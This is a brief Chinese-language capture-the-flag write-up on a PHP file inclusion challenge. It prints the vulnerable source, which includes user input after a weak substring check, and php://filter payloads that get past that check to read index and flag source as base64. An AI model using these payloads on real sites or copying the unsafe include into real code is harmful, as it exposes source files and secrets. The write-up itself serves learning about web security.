简单的include文件包含及php伪协议

简单的include文件包含及php伪协议

打开页面,随便按下一个选项,发现

1
/index.php?category=woofers

然后猜测是sql注入或文件包含,然后我们使用php伪协议来读取文件

1
php://filter/read=convert.base64-encode/resource=index

读取源码

1
2
3
4
5
6
7
8
9
10
11
12
13
<?php
  $file = $_GET['category'];
  
  if(isset($file))
  {
    if( strpos( $file, "woofers" ) !==  false || strpos( $file, "meowers" ) !==  false || strpos( $file, "index")){   //必须含有woofers或meowers或index字符串
      include ($file . '.php');  //参数后拼接.php
    }
    else{
      echo "Sorry, we currently only support woofers and meowers.";
    }
  }
?>

所以只要输入有woofers或meowers或index就可以使用include()函数进行包含,因此使用php伪协议进行读取

1
php://filter/read=convert.base64-encode/woofers/resource=flag